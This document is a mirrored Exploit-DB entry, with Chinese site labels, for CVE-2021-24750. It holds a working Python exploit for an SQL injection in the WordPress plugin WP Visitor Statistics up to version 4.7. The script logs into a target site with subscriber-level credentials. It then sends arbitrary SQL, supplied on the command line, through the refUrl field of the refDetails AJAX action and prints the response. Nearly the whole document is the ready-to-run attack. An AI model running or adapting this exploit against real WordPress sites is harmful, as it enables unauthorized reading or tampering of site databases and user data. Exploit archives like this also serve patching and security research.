WordPress Plugin WP Visitor Statistics 4.7 – SQL Injection

• Exploit Database
• 36 阅读

• 作者： Ron Jost
  日期： 2022-01-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50619/

• # Exploit Title: WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection
  # Date 22/12/2021
  # Exploit Author: Ron Jost (Hacker5preme)
  # Vendor Homepage: https://www.plugins-market.com/
  # Software Link: https://downloads.wordpress.org/plugin/wp-stats-manager.4.7.zip
  # Version: <= 4.7
  # Tested on: Ubuntu 18.04
  # CVE: CVE-2021-24750
  # CWE: CWE-89
  # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24750/README.md
  
  '''
  Description:
  The plugin does not properly sanitise and escape the refUrl in the refDetails AJAX action,
  available to any authenticated user, which could allow users with a role as low as
  subscriber to perform SQL injection attacks
  '''
  
  # Banner:
  banner = '''
   _________ ___ ______ __ ___ ________ ___
   / __)( \/ )( ___)___(__ \ / _ \(__ \ /)___(__ \ /. |(__ )| __) / _ \ 
  ( (__\/)__)(___)/ _/( (_) )/ _/)((___)/ _/(__)/ / |__ \( (_) )
   \___)\/(____) (____)\___/(____)(__) (____) (_)(_/(___/ \___/ 
  
  [+] WP Visitor Statistics SQL Injection
  [@] Developed by Ron Jost (Hacker5preme)
  
  '''
  print(banner)
  
  import argparse
  import requests
  from datetime import datetime
  
  # User-Input:
  my_parser = argparse.ArgumentParser(description='Wordpress Plugin WP Visitor Statistics - SQL Injection')
  my_parser.add_argument('-T', '--IP', type=str)
  my_parser.add_argument('-P', '--PORT', type=str)
  my_parser.add_argument('-U', '--PATH', type=str)
  my_parser.add_argument('-u', '--USERNAME', type=str)
  my_parser.add_argument('-p', '--PASSWORD', type=str)
  my_parser.add_argument('-C', '--COMMAND', type=str)
  args = my_parser.parse_args()
  target_ip = args.IP
  target_port = args.PORT
  wp_path = args.PATH
  username = args.USERNAME
  password = args.PASSWORD
  command = args.COMMAND
  
  print('')
  print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
  print('')
  
  # Authentication:
  session = requests.Session()
  auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
  check = session.get(auth_url)
  # Header:
  header = {
  'Host': target_ip,
  'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
  'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
  'Accept-Encoding': 'gzip, deflate',
  'Content-Type': 'application/x-www-form-urlencoded',
  'Origin': 'http://' + target_ip,
  'Connection': 'close',
  'Upgrade-Insecure-Requests': '1'
  }
  
  # Body:
  body = {
  'log': username,
  'pwd': password,
  'wp-submit': 'Log In',
  'testcookie': '1'
  }
  auth = session.post(auth_url, headers=header, data=body)
  
  # Exploit:
  exploit_url = 'http://' + target_ip + ':' + target_port + '/wordpress/wp-admin/admin-ajax.php?action=refDetails&requests={"refUrl":"' + "' " + command + '"}'
  exploit = session.get(exploit_url)
  print(exploit.text)
  print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))